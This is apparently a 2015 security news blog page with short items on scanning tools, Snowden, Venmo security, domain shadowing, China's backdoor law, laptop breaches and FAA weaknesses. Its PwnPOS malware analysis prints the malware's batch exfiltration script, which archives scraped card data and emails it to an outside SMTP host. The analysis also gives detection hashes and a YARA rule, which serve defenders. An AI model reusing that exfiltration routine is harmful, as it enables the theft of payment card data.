Thursday, 5 March 2015

VScan – Open Source Vulnerability Management System

VScan is an open source Vulnerability Management System designed to make it easier for an organization to track vulnerability resolution and ensure anything found in their infrastructure is fixed.
VScan was created as after a vulnerability assessment it can sometimes be difficult to track the implementation of a security improvement program, so this tool can help you measure your progress and simplify the process of fixing any problems found.
VScan - Open Source Vulnerability Management System
Basically what you want to know is, how many vulnerabilities did we have before? And how many do we have now?
So that’s where VScan comes in, basically it’s a web front end for Nessus (or whatever else you want to plug in on the back end) and gives you scanning capabilities to online commercial scanners like Acunetix Online Vulnerability Scanner, with the ability to omit (false positives) or recheck issues after they’ve been fixed.
You can download VScan here:
VScan-BH_Arsenal.tar.gz
Or read more here.

CMSmap – Content Management System Security Scanner

CMSmap is a Python open source Content Management System security scanner that automates the process of detecting security flaws of the most popular CMSs. The main purpose of CMSmap is to integrate common vulnerabilities for different types of CMSs in a single tool.
At the moment, CMSs supported by CMSmap are WordPress, Joomla and Drupal. This is as opposed to tools like WPScan or Droopescan which just specialise in the security of a single CMS system.
CMSmap - Content Management System Security Scanner
Please note that this project is an early state. As such, you might find bugs, flaws or mulfunctions. Use it at your own risk!

Usage

You can grab CMSmap by cloning their Github repo:
Or read more here.

Snowden willing to face trial in US, if it's fair


Edward Snowden, the former U.S. National Security Agency contractor who leaked details of the agency’s surveillance programs, is willing to return to the U.S. and face criminal charges, if he’s assured of a fair trial, according to a Russian news report.
Snowden, now living in Russia, is ready to return to the U.S. on the condition that he’s guaranteed a fair trial, Snowden lawyer Anatoly Kucherena told journalists Tuesday, according to a report from Russian news agency TASS.
Several Snowden lawyers are negotiating his return to the U.S., Kucherena said. U.S. Attorney General Eric Holder has promised in a letter to Snowden’s lawyers that he would not face a death sentence, Kucherena added.
So far, the Department of Justice has guaranteed Snowden “will not be executed, not that he will receive a fair trial,” the lawyer told reporters.
Snowden continues to work in IT in Moscow and consults with several U.S. companies as well, Kucherena told reporters.
Snowden faces espionage and theft of government property charges in the U.S. He’s been living in Russia for more than a year and a half, after originally fleeing the U.S. to Hong Kong in mid-2013. Media outlets began publishing stories based on Snowden’s leaks in June 2013.

Venmo mobile payment service under fire for security carelessness

Venmo is taking heat after a news report last week revealed security holes you could "drive a truck through," in the words of one aggrieved Venmo user whose account was defrauded to the tune of $2,850.
As Slate initially reported, Venmo - a mobile payment service - lacks some essential security safeguards against unauthorized account access, in particular two-factor authentication and sending users a notification when their password is changed.
The Venmo app allows people on the service to send payments to each other's Venmo accounts, which are linked to their bank accounts or a debit card.
Owned by the payment giant PayPal, Venmo is still small - with about 1.5 million users - but growing fast.
The company's rapid growth is perhaps outpacing its capacity to handle these concerns.
Venmo is especially popular among young people, who use the app in lieu of cash for things like splitting restaurant tabs and taxi fares, paying rent, and other transactions between friends.
If you want to pay your roommate back for buying beer last night, you send an electronic payment with a description of what it's for, and they'll instantly receive the payment.
Increasing its appeal with millennials, Venmo is also a social network - others on the service can see or comment on your transactions unless you set transactions to private (seen by only you and the other party) or "friends only."
A website called Vicemo takes advantage of this social aspect to stream transaction messages containing keywords related to "drugs, booze and sex."
Turning a payment app into a social network carries some risk, however, beyond the fact that anyone might find out you charged your friend for beer or perhaps something more sinful (or illegal).
Three MIT students noted some potential security concerns with the socially networked payment app in a paper published last May - arguing that because Venmo allows any user to send payment requests to any other user, it is vulnerable to social engineering attacks in which an attacker poses as a friend.
Venmo's (in)attention to detail has come under regulatory scrutiny too - the California Department of Business Oversight last July demanded a response from Venmo about more than 20 unsafe practices, the New York Times reported.
Among the issues identified by the California regulators was the absence of a "compliance system for active suspicious activity monitoring."
Part of that system, we hope, would include sending alerts to customers about suspicious activity on their accounts.
Chris Grey, a 30-year-old New Yorker, told Slate that he found out his Venmo and bank accounts had been debited $2850 after he was notified of a large transaction - not by Venmo, but by his bank.
The fraudster who gained access to Grey's Venmo account changed his password and added a new email address and mobile device to the account, but Grey didn't receive notifications about any of those changes.
Grey also didn't have much luck getting customer support in a timely manner - according to Slate, he didn't get a response from Venmo until a day and a half after reporting fraud on his account.
Despite handling billions of dollars in financial transactions, the company doesn't have a customer support line, just an email address and Twitter account.
Although Grey disputed the charges with his bank and was eventually credited the money back, what he discovered about Venmo's security protocols caused him - unsurprisingly - to quit Venmo.
In a blog post by General Manager Michael Vaughan, Venmo responded to the wave of bad publicity set off by the Slate article.
More precisely, Vaughan was responding to the idea that Venmo might not be all that secure, without directly addressing all of its security loopholes.
Vaughan stated that Venmo is compliant with the PCI-DSS payment industry standard, and provides a range of anti-fraud guarantees and security measures such as encryption of bank account details and transaction limits.
The company has fraud rates "favorable to industry standards," Vaughan said, and Venmo is also working on "a bunch of things" to improve security that it will be unveiling soon.

Hackers Targets Subdomains Of GoDaddy Customers

Hackers Targets Subdomains Of GoDaddy Customers
Cisco’s Talos intelligence team has identified an Angler Exploit Kit campaign that's using subdomains of GoDaddy customers to serve malwares or redirect victims to attack sites. Researchers says the Angler campaign is using a technique called "Domain Shadowing" to carry-out the malicious activities.

DOMAIN SHADOWING

Domain shadowing is the process of using users domain registration logins (stolen domain registration logins ) to create subdomains. Since the domain owners rarely monitor their domain registration credentials, the attackers are able to create massive list of malicious subdomains.
Cisco said, "We have identified close to 10K unique subdomains being utilized. This behaviour has shown to be an effective way to avoid typical detection techniques like blacklisting of sites or IP addresses. Since this campaign has done an exceptional job of rotation not only the subdomains, but also the IP addresses associated with the campaign."

"These subdomains are being rotated quickly minimizing the time the exploits are active, further hindering both block list effectiveness and analysis. This is all done with the users already registered domains.  No additional domain registration was found," they added.

Talos first spotted domain shadowing in September 2011. In May 2014, a new campaign started that was part of a browser lock campaign. The commonality of this campaign was the creation of police and alertpolice subdomains. These subdomains were created to serve the notification to compromised systems and provide payment details.

SUBDOMAIN ANALYSIS

The attackers creates multiple tiers of malicious subdomains including the tier responsible for the redirection to the actual exploit kit landing page.


Nick Biasini , threat researcher at Talos said, "The amount of subdomains being utilized for landing pages and exploits are greater than those used for redirection, by a factor of five. This could be related to the chain of events leading to compromise."

"From an IP address perspective the same IP is utilized across multiple subdomains for a single domain and multiple domains from a single domain account. There are also multiple accounts with subdomains pointed to the same IP. The addresses are being rotated periodically with new addresses being used regularly. Currently more than 75 unique IP’s have been seen utilizing malicious subdomains," he added.

China and US clash over software backdoor proposals

President Obama 
 President Obama said China should not be allowed to "snoop" on US tech firms' clients
Beijing has rejected President Obama's criticism of its plan to make tech companies put backdoors in their software and share their encryption keys if they want to operate in China.
On Monday, Mr Obama told the Reuters news agency he had "made it very clear" China had to change its policy if it wanted to do business with the US.
But Beijing said it needed the powers to combat terrorism and tackle leaks.
It also suggested the West was guilty of having double standards.
"The legislation is China's domestic affair, and we hope the US side can take a right, sober and objective view towards it," said Chinese foreign ministry spokeswoman Hua Chunying.
"On the information-security issue, there was a [recent] media revelation that a certain country embedded spying software in the computer system of another country's Sim card maker, for surveillance activities. This is only one out of the recently disclosed cases.
"All countries are paying close attention to this and taking measures to safeguard their own information security, an act that is beyond any reproach."
The case she was referring to involved allegations that US cyber-spies had hacked a Dutch Sim card manufacturer in order to help decrypt their targets' communications.
At another press conference, parliamentary spokeswoman Fu Ying drew attention to the fact that the US government had imposed restrictions on Chinese companies including Huawei and ZTE.
And she suggested that Beijing's proposals were in line with the same kind of access to internet correspondence sought by the US and British governments.
"We will definitely continue to listen to extensive concerns and all the parties' views, so we can make the law's formulation more rigorous," she added.
The rules are part of a proposed counter-terrorism law set to be discussed by China's annual parliament session, the National People's Congress (NPC), which opens on Thursday.
Backdoor graphic  
Experts warn that adding backdoors to software could make products vulnerable to hackers
'Paranoid espionage' President Obama's comments had followed the publication of a fresh draft of the proposed law, which was made public last week.
It "would essentially force all foreign companies, including US companies, to turn over to the Chinese government mechanisms where they can snoop and keep track of all the users of those services", the US leader said.
"As you might imagine tech companies are not going to be willing to do that," he added.
Microsoft, Cisco, Oracle and IBM are among firms that would potentially be affected.
While the comments by Chinese officials were measured, the government's press service, Xinhua, was more critical.
It accused the US leader of arrogance and hypocrisy, noting that the FBI had criticised Apple and Google last year for building encryption into their smartphone operating systems, and again drew attention to allegations about the US National Security Agency's activities made public by the whistleblower Edward Snowden.
"With transparent procedures, China's anti-terrorism campaign will be different from what the United States has done: letting the surveillance authorities run amok and turn counter-terrorism into paranoid espionage and peeping on its civilians and allies," Xinhua wrote.
"Contrary to the accusations of the United States, China's anti-terror law will put no unfair regulatory pressures on foreign companies, because the provisions will apply to both domestic and foreign firms."
Insecure systems The Conservative party has indicated it wants to expand the UK's cyber-spies' surveillance powers it if wins the May election.
Microsoft sign in China 
 US firms, including Microsoft, are hoping to boost profits by selling their services to China
"Our manifesto will make clear that we will... use all the legal powers available to us to make sure that, where appropriate, the intelligence and security agencies have the maximum capability to intercept the communications of suspects while making sure that such intrusive techniques are properly overseen," Home Secretary Theresa May told Parliament in January.
One expert said it should be no surprise that the West was finding it difficult to prevent China seeking greater cyber-surveillance powers of its own, but added there were good reasons to fear its proposals.
"Either behind the scenes or increasingly openly, the US and UK are justifying similar behaviour for their own purposes, but are extremely concerned when China asks for its own capabilities," said Dr Joss Wright, from the Oxford Internet Institute.
"But what we don't want to see is a world in which internet-based products and services are riddled with backdoors by every state that says it needs to act against terrorism.
"Backdoors are always a concern because they result in a system that is insecure by default, and which can be exploited. That makes everyone less safe."

Data breach at Pioneer Bank

ROTTERDAM – A laptop stolen from a Pioneer Bank employee "contained secured personal information of certain customers, including names, social security numbers, street addresses, and account and debit card numbers," the bank said in a letter to those customers.
Roy Pechtel, who uses the Pioneer branch on Altamont Ave. in Rotterdam, received the letter in the mail over the weekend. Pechtel told NewsChannel 13 he is concerned that his identity, and his retirement account, could be at risk.
"When I called them today, they didn't really have an answer," Petchtel said Monday. "They said their security people were trying to handle the problem their own way. I said, 'Nah, you're trying to cover something up here.'"
The laptop was stolen on January 26, the bank said in the letter. Pioneer said police were notified immediately, but the bank did not inform the affected customers or the state Attorney General’s Office until February 23.
"Pioneer Bank has been working closely with authorities regarding the theft," the bank said in a statement. "Protecting customer information is of the utmost importance to Pioneer, and it’s a priority we take very seriously."
Pioneer is not aware of any misuse of customers’ information as a result of the breach, the bank said in the letter. Pioneer said it is conducting additional monitoring on accounts, and extending one year of free credit monitoring to affected customers.
Citing the ongoing investigation, a Pioneer executive declined to answer a NewsChannel 13 reporter’s questions about where the laptop was stolen, and why an employee had some customers’ personal information on the laptop.
It was unclear late Monday whether the bank, or the employee, had violated the law. The state Department of Financial Services, which oversees the banking industry, is now investigating, a spokesman confirmed.
Eva Velasquez, president and CEO of the California-based Identity Theft Resource Center, told NewsChannel 13 it is not uncommon for escrow officers and loan officers to have customer information on their laptop.
But Velasquez said data breaches involving laptops are not common in the financial sector. She encouraged affected customers to inquire about additional layers of protection that might be available to them.

North Carolina credit union notification says laptop containing data missing

North Carolina-based Piedmont Advantage Credit Union is notifying an undisclosed number of individuals that one of its laptops containing personal information – including Social Security numbers – cannot be located.
How many victims? Undisclosed.
What type of personal information? Names, addresses, dates of birth, member account numbers, and Social Security numbers.
What happened? A Piedmont Advantage Credit Union laptop containing the personal information cannot be located.
What was the response? Law enforcement and a computer forensic firm have been engaged to investigate the matter. All impacted individuals are being notified, and offered a free year of credit bureau monitoring services.
Details: On Jan. 31, Piedmont Advantage Credit Union discovered that the laptop could not be located. The laptop included password protected authentication.
Quote: “Once again, to date it appears that no information has been accessed and no fraudulent activity has occurred,” according to a notification signed by Judy Tharp, president and CEO of Piedmont Advantage Credit Union.

PwnPOS: Old Undetected PoS Malware Still Causing Havoc

PwnPOS is one of those perfect examples of malware that’s able to fly under the radar all these years  due to its simple but thoughtful construction; albeit not being future proof. Technically, there are two components of PwnPOS: 1) the RAM scraper binary, and 2) the binary responsible for data exfiltration. While the RAM scraper component remains constant, the data exfiltration component has seen several changes – implying that there are two, and possibly distinct, authors. The RAM scraper goes through a process’ memory and dumps the data to the file and the binary uses SMTP for data exfiltration.
Installation
This malware family is a RAM scraper service that can install and remove itself via specific arguments. If run without any arguments, it will copy itself to %SystemRoot%\system32\wnhelp.exe, install a service called “Windows Media Help,” and automatically start itself with the -service switch.

Figure 1. Installed service
However, if with argument del, it will remove the service without deleting the file.

Figure 2. Service deletion routine
Most incident response and malware-related tools attempt to enumerate auto-run, auto-start or items that have an entry within the services applet in attempt to detect malicious files. Thus, having parameters that add and remove itself from the list of services allows the attacker to “remain persistent” on the target POS machine when needed, while allowing the malicious file to appear benign as it waits within the %SYSTEM$ directory for the next time it is invoked.
There are a few caveats about the malware’s installation routine:
  1. The Windows OS’ User Account Control feature (available since Windows Vista) is able to block its execution. The initial launch would be stored in %SystemRoot%\system32\DebugConsole.log and upon execution, it checks for administrator privilege. If it determines that the user session does not have administrator privilege, then it would output an error ERRLOG:error: not admin user.
  2. The file exe requires being within %SystemRoot%\system32 as the service it creates uses this path to the executable C:\WINDOWS\system32\wnhelp.exe -service. If executed within a 64-bit Operating System, the executed would be stored within C:\Windows\SysWOW64\ and thus the service itself fails to start.
The above-mentioned caveats may be a non-issue since a good majority of PoS terminals are still running on Windows XP and there is no pressing need for 64-bit operating system installations in these kinds of systems.
Memory Scraping
After the service starts, it grants SeDebugPrivilege permission and enumerates all running processes.

Figure 3. Enumeration of memory block
It then seeks for a specific pattern [0-9]*=, which is a set of numbers, to which the search result will be stored in %SystemRoot%\system32\prefb419.dat. It should be noted that it may seem normal to have %SystemRoot%\system32\pref*.dat files as they represent Microsoft Windows’ base performance counters.

Figure 4. Reading memory and searching for pattern
If the string of numbers is found within a memory space, it validates the string via the Luhn algorithm, a known checksum formula to validate a variety of identification numbers, in order to make sure it is a credit card number.

Figure 5. Luhn algorithm
The log format that’s written to the file perfb419.dat is (DateTime): (ProcessName) pid: (Process Id) (Context).
  • %Y.%m.%d %H:%M:%S: => 2015.01.22 12:12:12
  • Process Name => ???.exe
  • Process ID => 999
  • Context => Credit Card Number
The main block of execution repeats after a few seconds, enumerating the processes and going through each memory block to look for significant strings of numbers as indicated above.
Data Exfiltration
The data that is stored in perf419.dat may be harvested by two different binaries:
  • ccb91409ed05d4dcd45d691908f8df3ff6728d10 is packed via MPRESS and is seemingly coded via the cross-platform Purebasic programming language. Text included in the file contains both English and German language – seemingly used for system-generated messages.

    Figure 6. English and German text
    Upon execution, drops a file called win32.bat that contains the following lines that contains most of the data exfiltration routine. Below is the content of win32.bat:
    @echo off
    7z.exe a backup.7z perfb419.dat -pmanadeaur1qaz2wsx
    echo uniq > perfb419.dat
    snd.exe -smtp 37.59.26.94 -port 465 -t dumps.dumps@{BLOCKED}.com -f dumps@{BLOCKED}.cc -sub
    “Raport de la %computername%” -user dumps@{BLOCKED}.cc -pass 1234qwer -ssl -auth-login -attach backup.7z -M Hello
    DEL backup.7z
    DEL syshealth.7z
    DEL syshealth.log
    The routine is pretty much easy to understand: it first uses 7z.exe (standalone 7-zip executable) to create an archive called backup.7z from perfb419.dat, and uses a password defined as manadeaur1qaz2wsx. Note that this assumes also that this binary is within the same file directory of perfb419.dat. After that, it uses another standalone executable called snd.exe (from this mailsend project) to send an email to a pre-defined mail account via SMTP with SSL and authentication. Finally, it proceeds to clean up the files it used for this routine.
  • 7a8b966afdacbf174bec8588728d12bed9b56369 is an AutoIt-compiled executable that is packed via UPX. It has pre-defined variables (e.g., SMTP server, sender, recipient, attachments) within the lines of its decompiled code as seen below.

    Figure 7. AutoIt variable declaration
    Similarly, this binary uses 7z.exe to pack the interesting data and uses email for data exfiltration, but it comes with enhancements:
    1. It uses grep.exe, a tool that matches one or more input files for lines containing a match to a specified pattern, to match the string format mentioned above which, as you guessed, matches the lines within in perfb419.dat.
    2. Rather than utilizing a third-party executable to send email, it utilizes a known AutoIt routine that makes use of the Collaboration Data Objects (CDO) API suite that is built-in with Microsoft Windows.
    What is further interesting in this the fact that the recipient is that the recipient has a misspelled top-level domain (TLD) with {BLOCKED}@gmail.coom. What would happen here is that the originating sender—in this case, gomis@{BLOCKED}.{BLOCKED}–would receive a bounced message, usually with the original mail content – thus making the use of a common email problem called “backscatter” to good use.
Significant strings
Significant strings for the data exfiltration components are already listed in code blocks above.
However, for the RAM scraper service, we can definitely see two significant strings that can tell us a little bit about the author(s) as the character encoding is significant as it always converts the output strings into a very specific encoding:
The Program Database File (PDB) c:\r1\Release\r1.pdb
Character Encoding Russian_Russia.1251
So where have we seen this?
We have seen PwnPOS operating with other PoS malware like BlackPOS and Alina, among small-to-medium businesses (SMB) within Japan, APAC (Australia, India), NABU (United States and Canada) and EMEA (Germany, Romania) running 32-bit versions of either Windows XP or Windows 7.
Indicators
The indicators below are compiled based on the observed threat.
SHA1 Compile time Size
(in bytes)
Trend Micro Detection Possible Usage and Other Notes
b1983db46e0cb4687e4c55b64c4d8d53551877fa 2010-10-12 15:37:51 302,592 TSPY_POSLOGR.M Memory Scraping
476a0900bfb80b263b614192d0084b8f42f1a6a5 2010-10-12 15:37:51 302,592 TSPY_POSLOGR.M Memory Scraping, but edited. Dump file was changed/edited to macromed.dat and character encoding was misspelled ‘Russian_Rassia.1251’
2cf639a42e84feff74aba4289d47a8cc9fa247c4 2010-10-12 15:37:51 302,592 TSPY_POSLOGR.M Memory Scraping
f62c082cc4eae77a8e7191f53d898daee1917b36 2010-10-12 15:37:51 302,592 TSPY_POSLOGR.M Memory Scraping
2037896e8aa232e250ebf83261099299bfeaed2b 2010-10-12 15:37:51 344,064 TSPY_POSLOGR.M Memory Scraping
c420ae15511d5184e3c1d95c0da090d654ff28d9 2010-10-12 15:37:51 302,593 TSPY_POSLOGR.M Memory Scraping
404e22581c51c684e204ea89af3434ee8ad2af1c 2010-10-12 15:37:51 302,592 TSPY_POSLOGR.M Memory Scraping
373cd06734249b7404f2d6554b261aa330bff1ba 2010-10-12 15:37:51 114,688 TSPY_POSLOGR.M Memory Scraping, UPX
a22d23d0c84e352c4adeda87489f03dca0be5562 2010-10-12 15:37:51 302,592 TSPY_POSLOGR.M Memory Scraping
a11b5a08f792363964b357116ea6c2220104c6e1 2010-10-12 15:37:51 302,592 TSPY_PWNPOS.A Memory Scraping
aaa972c81b59d759e49ac0d60d79d66af35cfb3b 2010-10-12 15:37:51 302,592 TSPY_PWNPOS.A Memory Scraping, no UPX version of 373cd06734249b7404f2d6554b261aa330bff1ba
79e60bdfa9e0c9d8bcb12e20b98ba12df03912a5 2010-10-12 15:37:51 302,592 TSPY_PWNPOS.A Memory Scraping
ccb91409ed05d4dcd45d691908f8df3ff6728d10 2011-03-25 08:17:42 25,600 TSPY_PWNPOS.A Data exfiltration, MPRESS
7a8b966afdacbf174bec8588728d12bed9b56369 2012-01-29 15:32:28 397,501 TSPY_POSLOGR.M Data exfiltration, UPX, AutoIt
Below is the YARA rule to detect the RAM scraper component:
rule PoS_Malware_PwnPOS : PwnPOS
{
meta:
author = “Trend Micro, Inc.”
date = “2015-02-25″
description = “Used to detect PwnPOS RAM Scraper”
sample_filetype = “exe”
strings:
$string0 = “\\$l9D$d”
$string1 = “c:\\r1\\Release\\r1.pdb”
$string2 = “CMicrosoft Visual C++ Runtime Library” wide
$string3 = “StartServiceCtrlDispatcher(): service already running.”
$string4 = “DebugConsole.log”
$string5 = “-service”
$string6 = ” :: DebugConsole BEGIN Tee log ———-”
$string7 = “ERRLOG:”
$string8 = “lWindows Media Help” wide
$string9 = “- unable to open console device” wide
condition:
10 of them
}

US air traffic control computer system vulnerable to terrorist hackers

The US system for guiding airplanes is open to vulnerabilities from outside hackers, the Government Accountability Office said Monday. The weaknesses that threaten the Federal Aviation Administration's ability to ensure the safety of flights include the failure to patch known three-year-old security holes, the transmission and storage of unencrypted passwords, and the continued use of "end-of-life" key servers.
The GAO said that deficiencies in the system that monitors some 2,850 flights at a time has positioned the air traffic system into an "increased and unnecessary risk of unauthorized access, use or modification that could disrupt air traffic control operations." What's more, the report said the FAA "did not always ensure that sensitive data were encrypted when transmitted or stored." That information included stored passwords and "authentication data."
Among the findings:
While the Federal Aviation Administration (FAA) has taken steps to protect its air traffic control systems from cyber-based and other threats, significant security control weaknesses remain, threatening the agency's ability to ensure the safe and uninterrupted operation of the national airspace system (NAS). These include weaknesses in controls intended to prevent, limit, and detect unauthorized access to computer resources, such as controls for protecting system boundaries, identifying and authenticating users, authorizing users to access systems, encrypting sensitive data, and auditing and monitoring activity on FAA's systems. Additionally, shortcomings in boundary protection controls between less-secure systems and the operational NAS environment increase the risk from these weaknesses.
The flying public's safety is in jeopardy until there's a fix to the system used at some 500 airport control towers, the GAO said. (PDF) "Until FAA effectively implements security controls, establishes stronger agency-wide information security risk management processes ... the weaknesses GAO identified are likely to continue, placing the safe and uninterrupted operation of the nation's air traffic control system at increased and unnecessary risk."
The report chided the agency for failing to perform basic functions:
Additionally, the agency did not always ensure that security patches were applied in a timely manner to servers and network devices supporting air traffic control systems, or that servers were using software that was up-to-date. For example, certain systems were missing patches dating back more than 3 years. Additionally, certain key servers had reached end-of-life and were no longer supported by the vendor. As a result, FAA is at an increased risk that unpatched vulnerabilities could allow its information and information systems to be compromised.
Senators immediately demanded an explanation from the Transportation Department, which oversees the FAA.
"These vulnerabilities have the potential to compromise the safety and efficiency of the national airspace system, which the traveling public relies on each and every day," said John Thune (R-S.D.) and Bill Nelson (D-Fla.).
The transportation agency said it was working to correct the problems and has achieved "major milestones" toward that goal.